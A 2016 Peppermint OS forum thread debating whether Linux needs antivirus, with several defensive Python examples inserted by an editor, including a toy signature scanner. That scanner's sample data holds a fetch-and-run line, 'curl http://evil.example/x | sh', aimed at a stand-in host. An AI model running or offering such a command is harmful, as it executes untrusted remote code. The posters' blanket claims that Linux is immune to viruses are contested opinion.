Author Topic: When they ask you what antivirus software you use with Linux.  (Read 5847 times)

Offline DOSfan

  • Newly Subscribed
  • Posts: 17
  • Karma: 5
  • New Forum User
  • Peppermint version(s): PeppermintOS 7
Re: When they ask you what antivirus software you use with Linux.
« Reply #15 on: September 11, 2016, 02:39:21 pm »
Show me where that article states 900 viruses ?

You make a good point.  I admit that I did assume that most (if not all) of the 900 were virii, since they were testing anti-virus software.  But since a good AV program will check for other known vulnerabilities, there is no reason that the virii portion couldn't be half, or even less, of that number.

Now the real question is:  If AV-Test checked against 900 known Linux attacks (and no, that isn't necessarily all the known attacks) just how many Linux boxes out there are infected and people don't know because they have been mistakenly led to believe that AV is unnecessary?

I'm sure many of the users here (assuming they are old enough) have their own horror stories of friends or family who didn't know to run AV on their Windows machines and thought they were fine.

As I hinted earlier when mentioning my Windows history, just because you know no malware is on your system, doesn't mean you aren't infected.

EDITed to add:
Well I came across this site for security a while back:

https://www.thefanclub.co.za/how-to/how-secure-ubuntu-1604-lts-server-part-1-basics

I have been using RKHunter and CHKRootKit which seem thorough as well as the IP spoofing tweak in both firefox and Peppermint 7  ;)

That is a very good guide.  Too bad those couldn't be the default installs on linux machines, since it falls outside the basic user's comfort level.
« Last Edit: September 11, 2016, 02:43:19 pm by DOSfan »

Offline PCNetSpec

  • Administrator
  • Hero
  • Posts: 26452
  • Karma: 65531
  • "-rw-rw-rw-" .. The Number Of The Beast
  • Peppermint version(s): Peppermint 10
Re: When they ask you what antivirus software you use with Linux.
« Reply #16 on: September 11, 2016, 03:05:28 pm »
Okay I was going to leave it but this:-

Quote
just how many Linux boxes out there are infected and people don't know because they have been mistakenly led to believe that AV is unnecessary?

is just offensive .. I'm one of those that advise it's not necessary and that's not a mistake.

Stop believing the press and AV community (who both have a vested interest in spreading FUD) and study how Linux works ..

a) how it would be nearly impossible to get malicious code into the software chain in the first place.
b) the fact that binary executables arriving from the web have their execute bit disabled
c) how any executable in your home folder can't break out unless you specifically make it executable then run it with elevated privileges
d) how things cannot traverse the network from machine to machine without having the execute bit disabled
e) find ANYWHERE that shows what all these so called viruses are, and shows their attack vector doesn't require local access or (hard to achieve) stupidity on the part of the user.

and most of all trust the fact that in 7 years of using Linux and installing it on MANY machines I have not come across a single virus (though there have been many discovered exploits in this time .. ALL patched quicker than an AV company could respond) .. nor have I seen a SINGLE verifiable infection mentioned online that wasn't by someone who stands to gain by the FUD and showed the attack vector in a meaningful way.

Viruses are so rare in the Linux world as to be insignificant, nobody writes them because they can't spread and can do very little damage .. hacks are a different matter but are quickly patched against .. AV would not help here unless maybe your updater was broken or you'd been stupid enough to disable it.

That article (as usual) doesn't give ANY details and is so vague as to be meaningless .. even if I were to trust an article by and quoting vague figures by an industry that stands to gain from this FUD.

Show me the evidence .. clear concise evidence that shows the remote attack vector, and how it could spread (and has in the real world) about a SINGLE Linux virus.
And on the off chance you can find some historical reference to a real virus that managed to infect a handful of Linux boxes .. show how running AV would have mitigated it.

Stick to the default repos and stay updated, and you are safer than ANY AV could ever make you .. be an idiot and install from unknown locations and no AV will help you anyway as it CANNOT protect against stuff not in its definitions.
« Last Edit: September 11, 2016, 03:40:11 pm by PCNetSpec »
WARNING: You are logged into reality as 'root' .. logging in as 'insane' is the only safe option.

Team Peppermint
PCNetSpec
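
An added example of the execute-bit mechanics behind points b) and c) above, in Python; this is the editor's demonstration, not code from the post or from Peppermint. It creates a file the way a browser download is created, checks its mode bits, applies the chmod a user would have to apply, and audits a directory for files that carry execute, setuid or setgid bits. The file name and contents are constructed for the demo.

```python
import os
import stat
import tempfile


def simulate_download(directory, name, data):
    """Create a file the way a browser download does: O_CREAT with 0o666,
    which the umask trims to 0o644 on a typical desktop. No execute bit is
    ever requested, so the kernel will refuse to exec the result."""
    path = os.path.join(directory, name)
    fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o666)
    try:
        os.write(fd, data)
    finally:
        os.close(fd)
    return path


def has_exec_bit(path):
    """True if any of the user/group/other execute bits is set."""
    mode = os.stat(path).st_mode
    return bool(mode & (stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH))


def mark_executable(path):
    """What `chmod a+x` does: add the execute bit for user, group and other."""
    mode = stat.S_IMODE(os.stat(path).st_mode)
    os.chmod(path, mode | stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH)


def audit_executables(directory):
    """Return (name, octal mode, flags) for each regular file that carries an
    execute bit; flags call out setuid/setgid (privilege gained on exec) and
    world-writable (anyone can swap the contents before it runs)."""
    findings = []
    for name in sorted(os.listdir(directory)):
        path = os.path.join(directory, name)
        st = os.lstat(path)
        if not stat.S_ISREG(st.st_mode):
            continue
        mode = stat.S_IMODE(st.st_mode)
        if not mode & (stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH):
            continue
        flags = []
        if mode & stat.S_ISUID:
            flags.append("setuid")
        if mode & stat.S_ISGID:
            flags.append("setgid")
        if mode & stat.S_IWOTH:
            flags.append("world-writable")
        findings.append((name, oct(mode)[2:], flags))
    return findings


def demo():
    """Walk through the scenario in a scratch directory and return what each
    step observed: (fresh download, after chmod a+x, after a setuid bit)."""
    old_umask = os.umask(0o022)  # typical desktop umask, so 0o666 -> 0o644
    try:
        with tempfile.TemporaryDirectory() as d:
            # constructed stand-in for a script fetched from a website
            p = simulate_download(d, "installer.sh", b"#!/bin/sh\necho hi\n")
            before = (has_exec_bit(p), audit_executables(d))
            mark_executable(p)
            after = (has_exec_bit(p), audit_executables(d))
            os.chmod(p, 0o4755)  # what a setuid binary looks like to the audit
            with_suid = audit_executables(d)
            return before, after, with_suid
    finally:
        os.umask(old_umask)


if __name__ == "__main__":
    for label, result in zip(("downloaded", "after chmod a+x", "setuid"), demo()):
        print(label, result)
```

The mode bits gate the kernel's own exec path; an interpreter handed the file as an argument (sh ./installer.sh) reads it like any other text, so the audit reports what has been made directly runnable rather than everything that could be run.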

Offline perknh

  • Trusted User
  • Hero
  • Posts: 4013
  • Karma: 373
  • Soy un huevo, nada más.
  • Peppermint version(s): Peppermint 10
Re: When they ask you what antivirus software you use with Linux.
« Reply #17 on: September 11, 2016, 03:17:16 pm »
Hi DOSfan,

As I hinted earlier when mentioning my Windows history, just because you know no malware is on your system, doesn't mean you aren't infected.

I've seen this with my own eyes watching an AV program in an unsupported Windows XP computer go haywire every 10 minutes.  Linux, fortunately, is built differently than Windows.  And, for this, I will always be grateful to Linux.  This YouTube video says pretty much what PCNetSpec just said.  But, you might enjoy it anyway.  ;)


Why Linux is Safer than Windows or MacOS

by Kris Occhipinti --posted on YouTube

https://www.youtube.com/watch?v=n4PGJbDlvsU
[T]here are a lot of people happily running Peppermint ICE which hasn't been receiving ANY updates for a while now .. and I personally would STILL consider that MUCH more secure than any version of Windows with up-to-date AV/Anti-malware ;)

--  PCNetSpec, Cornwall, Eng.  Dec 03, 2013 5:18 pm

Offline DOSfan

  • Newly Subscribed
  • Posts: 17
  • Karma: 5
  • New Forum User
  • Peppermint version(s): PeppermintOS 7
Re: When they ask you what antivirus software you use with Linux.
« Reply #18 on: September 12, 2016, 02:48:24 pm »
trust the fact that in 7 years of using Linux and installing it on MANY machines I have not come across a single virus

Did you look / scan for them?  Did you even think about looking for them?

Obviously, you will not find something if you never look for it.  That is just simple logic at work there.  Don't even need a CompSci degree to understand that.

Look, it doesn't take much.  Just change the knee-jerk response of
Quote
AV is unnecessary
to
Quote
In most situations, AV should be unnecessary

That is all that is needed to reduce the examples of these poor souls who ended up installing a virus due to (emphasis mine):
Quote
The point is that I was dumb enough to think that Ubuntu was secure enough out here in the Linux wonderland that I love so much that I ended up on gnome-look downloading everything that looked cool without examining everything first.

And in closing, I'll leave this quote from this thread:
Quote from: Steve DL
You can install an antivirus if you want. It should not hurt your machine, but don't expect much protection for your system and don't consider yourself entirely safe. The efficacy of antivirus software is very relative, and they're mostly in use to avoid propagate old malware especially if you have Windows machines in your ecosystem. You should expect a performance decrease, though there are no benchmarks of AV performance on Linux as of today so it can't be quantified.

Why is it that you're not safe with just an antivirus? Because they're only one part of the needed mechanisms. At the moment there are a lot of missing tools for desktop security on Linux. What are the different security mechanisms relevant to desktops?

    Graphic stack security (to prevent keyloggers, clickjacking, screen recording, clipboard sniffing, etc)
    App distribution schemes with security checks (app stores and repositories with static analysis on the apps) and fast security updates
    Malware detection: signature-based (to protect from identified threats) and heuristics-based (or so they say, I've never used any heuristics-based AV and I suspect this is mostly marketing talk to say "we'll throw tons of security warnings at your face when you use a new app")
    Sandboxing (which consists of isolating apps from one another by design)
    Contextual authorisation to use devices and user data with security by designation / user-driven access control / powerboxes / contracts ; requires sandboxing

Currently the only decent thing on Linux is the app security updates, through repositories. All the rest is substandard.
Graphic stack security

We're all relying on the X11 graphical server. X.Org existed for 30 years and the original design is still in use in the server. Back in the day there were no desktop security issues and you won't be surprised to learn that it's not secure at all. You have APIs right out of the box for implementing keyloggers, doing remote code exploitations if the user has any root console open, replacing the session locker to steal passwords, etc, etc.

It's hard to evaluate how Windows 8 and OS X fare on this topic because I could not find any detailed explanations on their graphic stack implementation. Their sandboxed apps have restricted access to most obvious attack vectors but it's really unclear how well designed and implemented this all is. It seems to me that Win 8 forcing Store Apps to run fullscreen and one at a time hides issues in designing a full scale secure window manager. There are lots of issues to take into consideration wrt. window position and sizing, use of transparency and fullscreen, etc. when implementing a window manager with security in mind. I have no idea how OS X does.

Linux will be switching to Wayland in the coming years, which is designed with security in mind. We have a clear model of what capabilities should exist and a general idea of how these will be enforced and how authorisation can be obtained. The main person behind this work is Martin Peres though I happen to be involved in discussing the user and developer experience behind the capabilities. Design and development are ongoing so don't expect anything any time soon. Read this post for more information. Wayland will provide security seamlessly when used in conjunction with app sandboxing.
App distribution

Linux has a system of repositories with various levels of trust, which trained our users to rely only on provided apps and to be wary of proprietary code. This is very good in theory.

In practice I don't know a single distributor that enforces even the most basic security checks on their packaged apps. No static analysis whatsoever for weird system calls, and for anything community it's really not clear whether pre- and post-install scripts (which run as root) are verified at all for obvious bad things.

The security checks done on extensions to GNOME Shell are very light and manual, but at least exist. I don't know about KDE's extensions or other apps.

One area where we shine is that we can pull security updates very fast, usually within a few days for any security flaw. Until recently Microsoft was much slower than that, though they caught up.
Malware detection

The only antivirus software I know on Linux is ClamAV. It seems to me that it only works based on signatures, but then again as you pointed out, we don't have any identified desktop malware to protect against.

There probably are people writing Linux desktop malware in the world of Advanced Persistent Threats. See Mask for an example. It's unlikely that standard AV can do anything against those since APT malware authors are usually talented enough to come up with zero-day exploits.

Now, Microsoft advertises fuzz-testing all of its software for tens of thousands of hours, as opposed to virtually no secure coding practices at all in the Linux ecosystem. From personal experiments with fuzzing I'm absolutely convinced that there are a handful of low-hanging zero-day exploits in some popular Linux software. This will come to hit us on the day we have a financially-viable user base for commonplace malware authors, and then we'll see how good ClamAV turns out to be, but I suspect the app update mechanism will have a bigger impact at dealing with discovered vulnerabilities.

Needless to say both Windows and OS X do significantly better than Linux on this criteria.
Sandboxing and contextual authorisation

Both OS X and Windows 8 provide sandboxing for the apps hosted on their store. I'm not done looking into the quirks of OS X, but Windows 8 Store Apps have very serious limitations in terms of languages and APIs supported, available features and general user experience that can be provided with them. That means unsandboxed desktop apps are here to stay and Microsoft's sandboxing will not protect against malware, only against crafted documents in buggy (Store App) software. OS X seems to do much better though any non-store app is not sandboxed, as well.

Linux has no GUI app sandbox working seamlessly enough at the moment. We have the underlying confinement technology (the best candidates being Containers based on Linux namespaces, see LXC and Docker, and the next-to-best being MAC enforcement systems that would need to be developed to support some amount of dynamicity). We almost have the IPC and process management mechanisms needed to deploy and handle those sandboxed apps thanks to amazing work on kdbus and systemd. There are a few bits missing, with a few proposals being pushed mostly by the GNOME Foundation (see this video on Sandboxing at GUADEC 13). I'm also involved in discussing how access to data and authorisation can occur but there's no consensus between the few interested people, and design and development take time. It'll probably be a couple more years before decent prototypes exist and before sandboxing is deployed to Linux on any relevant scale.

One of the big issues faced on all platforms is finding out how to authorise apps to get access to data and device capabilities at the right scale. That means, how to let them do what they need to do without pestering users with authorisation prompts whilst preventing apps from abusing privileges. There are serious loopholes in how Windows 8 lets Store Apps handle recent documents and apps' futureAccessList. At this stage securing document access further without aggravating the cost of security for developers and users is an open question, which a bunch of people happen to be working on as well :)

Can anyone here dispute all of this?

Can anyone dispute any of it?

And with that, I'm out.  Too many arrogant, self-absorbed, p****s on this forum who care much more about their egos rather than improving the linux community.

As the saying goes, you need me a Hell of a lot more than I need you.  Even if you don't need me, that just illustrates how little I need you.  And Peppermint was such a fine distro...
« Last Edit: September 12, 2016, 03:03:47 pm by PCNetSpec »
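
The "signature-based" detection the quoted answer describes, as an added example (the editor's, not ClamAV's code and not from the thread): a toy scanner that reads entries in ClamAV's .hdb (MD5:size:name) and .ndb (name:target:offset:hex) line formats and runs them over constructed samples. Only the "??" single-byte wildcard and the "*" offset are implemented; the sample bytes and signature names are made up. The two modified copies at the end show the point made earlier in the thread, that a definitions-only scanner sees nothing it has no entry for.

```python
import hashlib
import re

# Constructed samples standing in for files on disk (SAMPLE_B is not a real ELF).
SAMPLE_A = b"#!/bin/sh\ncurl http://evil.example/x | sh\n"
SAMPLE_B = b"\x7fELF" + b"\x00" * 8 + b"EVILMARK" + b"\x01payload"


def parse_hdb(text):
    """ClamAV .hdb lines: MD5:FileSize:Name ('*' size = any size)."""
    sigs = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        md5, size, name = line.split(":", 2)
        sigs.append((md5.lower(), None if size == "*" else int(size), name))
    return sigs


def _hex_to_regex(hexsig):
    """Turn a hex body into a bytes regex; '??' is the any-byte wildcard."""
    pairs = [hexsig[i:i + 2] for i in range(0, len(hexsig), 2)]
    body = b"".join(b"." if p == "??" else re.escape(bytes.fromhex(p)) for p in pairs)
    return re.compile(body, re.DOTALL)


def parse_ndb(text):
    """ClamAV .ndb lines: Name:TargetType:Offset:HexSignature.
    Offset '*' means anywhere; a number means the match must begin there."""
    sigs = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        name, _target, offset, hexsig = line.split(":", 3)
        sigs.append((name, offset, _hex_to_regex(hexsig)))
    return sigs


def scan(data, hdb_sigs, ndb_sigs):
    """Return the names of every signature that matches the blob."""
    hits = []
    digest = hashlib.md5(data).hexdigest()
    for md5, size, name in hdb_sigs:
        if md5 == digest and (size is None or size == len(data)):
            hits.append(name)
    for name, offset, rx in ndb_sigs:
        if offset == "*":
            matched = rx.search(data) is not None
        else:
            matched = rx.match(data, int(offset)) is not None
        if matched:
            hits.append(name)
    return hits


def load_demo_signatures():
    """Constructed database: one hash entry for SAMPLE_A, three pattern entries."""
    hdb = parse_hdb(
        "# md5:size:name\n"
        f"{hashlib.md5(SAMPLE_A).hexdigest()}:{len(SAMPLE_A)}:Demo.Script.A\n"
    )
    ndb = parse_ndb(
        "# name:target:offset:hex\n"
        "Demo.Elf.Header:0:0:7f454c46\n"          # '\x7fELF' at offset 0
        "Demo.Marker.B:0:*:4556494c4d41524b\n"    # 'EVILMARK' anywhere
        "Demo.Wild:0:*:4556??4c4d41\n"            # 'EV?LMA', '??' = any byte
    )
    return hdb, ndb


def demo():
    """Scan the samples and two lightly modified copies; the modified ones
    show what a definitions-only scanner cannot see."""
    hdb, ndb = load_demo_signatures()
    return {
        "A": scan(SAMPLE_A, hdb, ndb),
        "B": scan(SAMPLE_B, hdb, ndb),
        "A+1byte": scan(SAMPLE_A + b"\n", hdb, ndb),  # hash no longer matches
        "B-recased": scan(SAMPLE_B.replace(b"EVILMARK", b"EvilMark"), hdb, ndb),
    }


if __name__ == "__main__":
    for label, hits in demo().items():
        print(f"{label}: {hits or 'clean (no matching definition)'}")
```

Appending one byte defeats the hash entry and re-casing one word defeats the byte pattern, which is why signature databases need constant feeding and why an unknown sample passes clean.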

Offline PCNetSpec

  • Administrator
  • Hero
  • Posts: 26452
  • Karma: 65531
  • "-rw-rw-rw-" .. The Number Of The Beast
  • Peppermint version(s): Peppermint 10
Re: When they ask you what antivirus software you use with Linux.
« Reply #19 on: September 12, 2016, 03:25:19 pm »
So your main argument was a copy/paste of a response elsewhere that actually says AV in linux is pretty pointless :-\

The rest doesn't warrant a response.

Offline perknh

  • Trusted User
  • Hero
  • Posts: 4013
  • Karma: 373
  • Soy un huevo, nada más.
  • Peppermint version(s): Peppermint 10
Re: When they ask you what antivirus software you use with Linux.
« Reply #20 on: October 06, 2016, 04:12:20 pm »
There's an interesting argument presented here that installing an antivirus in Linux can actually make an ordinary home user less safe than not installing one.  Wow! :o

Offline acer

  • Member
  • Posts: 243
  • Karma: 40
  • Peppermint version(s): Peppermint 9R x86/ 10 x64
Re: When they ask you what antivirus software you use with Linux.
« Reply #21 on: October 07, 2016, 01:01:26 am »
Anti-virus isn't required in Linux.
I'm pretty sure that will change in time but for now, not needed.

I'd be more worried about using the modem/router supplied by your ISP  :P

'Just because you're paranoid, doesn't mean they are not out to get you' springs to mind.  :)

Offline perknh

  • Trusted User
  • Hero
  • Posts: 4013
  • Karma: 373
  • Soy un huevo, nada más.
  • Peppermint version(s): Peppermint 10
Re: When they ask you what antivirus software you use with Linux.
« Reply #22 on: October 07, 2016, 04:19:28 am »
I'd be more worried about using the modem/router supplied by your ISP  :P

Interesting that you said that, after reading the article I did disable Universal Plug and Play (UPnP) in my router.  PCNetSpec already helped me protect my router from WAN attacks. 

'Just because you're paranoid, doesn't mean they are not out to get you' springs to mind.  :)

True!  ;D 

Even Yahoo comes to mind, China too, and now, Yandex.  How does one protect oneself from the usually well-intended, but frequently misguided, governmental policy and tampering?  Disregarding all the Creeple Peeple that are out there trying to create mischief, worldwide governmental policies often appear to be unwittingly making matters worse and not better for the ordinary Joe and Jane who just wants to use his or her computer with security, privacy, and peace.


Offline acer

  • Member
  • Posts: 243
  • Karma: 40
  • Peppermint version(s): Peppermint 9R x86/ 10 x64
Re: When they ask you what antivirus software you use with Linux.
« Reply #23 on: October 07, 2016, 05:12:55 am »
UPnP has always been an issue since around the turn of the millennium.

Nowadays ISPs are to blame for this due to leaving ports open to facilitate internet TV and THEY know it.
The problem lies in the TV/console or any other attached device that can't open/close/hide the port once it's switched off from the internet.

The one common denominator to bad security is the router, I've seen it in so many home-users set-up who are oblivious to the potential.

I, for one, can state I won't be getting a smart meter from energy suppliers if this is the way things are to continue.  :P

If you're interested, try the Gibson Research website and check your settings with Shields UP!
I've been using it for years and find it a great resource to check the security of your own setup.

https://www.grc.com/x/ne.dll?bh0bkyd2
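
As an added example (the editor's, not from the post), a Python check for the UPnP exposure acer and perknh mention: it sends the standard SSDP M-SEARCH for an Internet Gateway Device to 239.255.255.250:1900 and parses whatever answers. A router that replies has UPnP on, which is what lets any LAN host, malware included, ask it to open a port. The reply parsing is exercised on a constructed sample so the logic can be checked offline; discover() needs a real LAN. The sample's addresses and SERVER string are made up.

```python
import socket

SSDP_ADDR = ("239.255.255.250", 1900)
IGD_ST = "urn:schemas-upnp-org:device:InternetGatewayDevice:1"

# Constructed reply, shaped like what a home router returns to an M-SEARCH.
SAMPLE_REPLY = (
    b"HTTP/1.1 200 OK\r\n"
    b"CACHE-CONTROL: max-age=1800\r\n"
    b"ST: urn:schemas-upnp-org:device:InternetGatewayDevice:1\r\n"
    b"USN: uuid:12345678-0000-0000-0000-000000000001::"
    b"urn:schemas-upnp-org:device:InternetGatewayDevice:1\r\n"
    b"LOCATION: http://192.168.1.1:1900/igd.xml\r\n"
    b"SERVER: Linux/2.6 UPnP/1.0 DemoRouter/1.0\r\n"
    b"\r\n"
)


def build_msearch(search_target=IGD_ST, mx=2):
    """The multicast request a UPnP control point sends to find devices;
    asking for the IGD type makes only routers answer."""
    return (
        "M-SEARCH * HTTP/1.1\r\n"
        f"HOST: {SSDP_ADDR[0]}:{SSDP_ADDR[1]}\r\n"
        'MAN: "ssdp:discover"\r\n'
        f"MX: {mx}\r\n"
        f"ST: {search_target}\r\n"
        "\r\n"
    ).encode("ascii")


def parse_ssdp_response(raw):
    """Parse an HTTP/1.1-style SSDP reply into lowercase header names.
    Returns None for anything that is not a 200 OK unicast reply."""
    text = raw.decode("utf-8", errors="replace")
    head = text.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    if not lines[0].upper().startswith("HTTP/1.1 200"):
        return None
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return headers


def is_gateway(headers):
    """True when the reply advertises an Internet Gateway Device, i.e. the
    router whose port mappings UPnP lets any LAN host create."""
    return ("InternetGatewayDevice" in headers.get("st", "")
            or "InternetGatewayDevice" in headers.get("usn", ""))


def discover(timeout=2.0, search_target=IGD_ST):
    """Send one M-SEARCH and collect (source IP, headers) for each reply.
    Needs a real LAN; an empty list means nothing answered within timeout."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
    sock.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 2)
    sock.settimeout(timeout)
    found = []
    try:
        sock.sendto(build_msearch(search_target), SSDP_ADDR)
        while True:
            data, addr = sock.recvfrom(65535)
            headers = parse_ssdp_response(data)
            if headers is not None:
                found.append((addr[0], headers))
    except socket.timeout:
        pass
    finally:
        sock.close()
    return found


if __name__ == "__main__":
    for ip, h in discover():
        kind = "gateway" if is_gateway(h) else "device"
        print(f"{ip}: {kind} server={h.get('server')} location={h.get('location')}")
```

Shields UP probes from the WAN side; this probes from the LAN side, so the two are complementary. A gateway answering here does not by itself prove a port is reachable from outside, but it does mean port mappings can be created without anyone touching the router's admin page.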

Offline perknh

  • Trusted User
  • Hero
  • Posts: 4013
  • Karma: 373
  • Soy un huevo, nada más.
  • Peppermint version(s): Peppermint 10
Re: When they ask you what antivirus software you use with Linux.
« Reply #24 on: October 07, 2016, 08:47:30 am »
Hi acer,

Shields UP is great, as is the DNSCrypt proxy tool...which can even be found in our package manager (dnscrypt-proxy) from Synaptic.  ;)

Yandex browser beta is heavily into using DNSCrypt.  That's where I discovered the idea of DNSCrypt in the first place.  Might be worth a look-see, but, impressive as it is, I wouldn't stay with the browser too long now.  The Russian government's new policy of ordering all Russian private tech companies to hand over their encryption keys is really quite a turn-off.

But if you have a little patience, and you want to check out Yandex browser beta, I think you'd find it to be quite impressive.  It's minimalist, lightning fast, and, if you enable DNSCrypt, very, very secure...that is, except if, or when, Russia's Big Brother decides arbitrarily that you are a person of interest...or worse, a vector for some digital mischief!  :-X

Bummer too, Yandex is a spectacular company.  Yandex browser beta WAS my new favorite browser --because of its minimalism, speed and use of DNSCrypt.

But without any doubt, we know one thing for certain; we don't need, or even want to use, antivirus software with Linux!  :)

perknh


Offline scifidude79

  • Hero
  • Posts: 4029
  • Karma: 870
  • Peppermint version(s): Peppermint 9
Re: When they ask you what antivirus software you use with Linux.
« Reply #25 on: October 07, 2016, 08:55:47 am »
Anti-virus isn't required in Linux.
I'm pretty sure that will change in time but for now, not needed.

Maybe it will, maybe it won't.  First, somebody has to figure out how to make a virus that can attack Linux.  That's easier said than done, since Linux doesn't have the gaping security holes that other operating systems do.  Also, with a community of people watching the code worldwide, security holes are quickly plugged up via patch updates.  Then there's the other thing about Linux, it requires you to enter an admin password to make system level changes.  Since viruses run amuck and make system level changes, you'd basically have to give the virus permission to run.  I'm sure virus coders haven't figured out a way around that one.  Until they do, a virus could literally sit there on your system and do absolutely nothing.

Offline acer

  • Member
  • Posts: 243
  • Karma: 40
  • Peppermint version(s): Peppermint 9R x86/ 10 x64
Re: When they ask you what antivirus software you use with Linux.
« Reply #26 on: October 07, 2016, 10:14:16 am »
Shields UP is great, as is the DNSCrypt proxy tool...which can even found in our package manager (dnscrypt-proxy) from Synaptic.  ;)
So does this work on the same level as HTTPS Everywhere with the addition of your DNS connection?
Will check it out thanks.
But without any doubt, we know one thing for certain; we don't need, or even want to use, antivirus software with Linux!  :)
With you on that comment  ;)

Maybe it will, maybe it won't.  First, somebody has to figure out how to make a virus that can attack Linux.  That's easier said than done, since Linux doesn't have the gaping security holes that other operating systems do.  Also, with a community of people watching the code worldwide, security holes are quickly plugged up via patch updates.  Then there's the other thing about Linux, it requires you to enter an admin password to make system level changes.  Since viruses run amuck and make system level changes, you'd basically have to give the virus permission to run.  I'm sure virus coders haven't figured out a way around that one.  Until they do, a virus could literally sit there on your system and do absolutely nothing.
Linux, as is, won't get infected due to the structure of the system, that I am aware of, but I don't have a crystal ball for the future...or maybe I do, it's just cloudy!
(the cloud is a different kettle of fish)
As perknh says 'we don't need, or even want to use, antivirus software with Linux!'  ;)
« Last Edit: October 07, 2016, 10:16:26 am by acer »

Offline perknh

  • Trusted User
  • Hero
  • Posts: 4013
  • Karma: 373
  • Soy un huevo, nada más.
  • Peppermint version(s): Peppermint 10
Re: When they ask you what antivirus software you use with Linux.
« Reply #27 on: October 07, 2016, 04:36:53 pm »
So does this work on the same level as HTTPS Everywhere with the addition of your DNS connection ?

Yeah, that's the analogy OpenDNS uses to describe the principle behind DNSCrypt:

https://www.opendns.com/about/innovations/dnscrypt/

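
To make the HTTPS analogy concrete, an added Python example (the editor's, not from the post or from OpenDNS): it builds an ordinary UDP DNS query and then parses it the way a passive observer on the path would, recovering the queried name and record type in the clear. That plaintext is what DNSCrypt takes off the wire. No network is used; the "captured" datagram is the one the code builds, and the names are examples.

```python
import struct

QTYPES = {1: "A", 5: "CNAME", 15: "MX", 16: "TXT", 28: "AAAA"}


def build_query(name, qtype=1, txid=0x1234):
    """Encode a standard recursive query, the shape a stub resolver sends."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)  # RD=1, one question
    qname = b"".join(
        bytes([len(label)]) + label.encode("ascii")
        for label in name.rstrip(".").split(".")
    ) + b"\x00"
    return header + qname + struct.pack("!HH", qtype, 1)  # class IN


def read_name(pkt, offset):
    """Decode a label sequence starting at offset; follows one compression
    pointer if present. Returns (name, offset just past the field)."""
    labels = []
    while True:
        length = pkt[offset]
        offset += 1
        if length == 0:
            break
        if length & 0xC0 == 0xC0:  # pointer into an earlier part of the packet
            pointer = ((length & 0x3F) << 8) | pkt[offset]
            labels.append(read_name(pkt, pointer)[0])
            offset += 1
            break
        labels.append(pkt[offset:offset + length].decode("ascii"))
        offset += length
    return ".".join(labels), offset


def observe(pkt):
    """What a passive on-path observer recovers from one DNS datagram:
    transaction id, whether it is a response, and every (name, type) asked."""
    txid, flags, qdcount, _an, _ns, _ar = struct.unpack("!HHHHHH", pkt[:12])
    offset = 12
    questions = []
    for _ in range(qdcount):
        name, offset = read_name(pkt, offset)
        qtype, _qclass = struct.unpack("!HH", pkt[offset:offset + 4])
        offset += 4
        questions.append((name, QTYPES.get(qtype, str(qtype))))
    return {"id": txid, "is_response": bool(flags & 0x8000), "questions": questions}


if __name__ == "__main__":
    captured = build_query("mail.example.com", 15)  # constructed "capture"
    print(observe(captured))
```

Everything observe() returns is readable by the ISP, the coffee-shop router and anyone else between the client and the resolver; encrypting the channel, as dnscrypt-proxy does, leaves them only the fact that a DNS conversation happened.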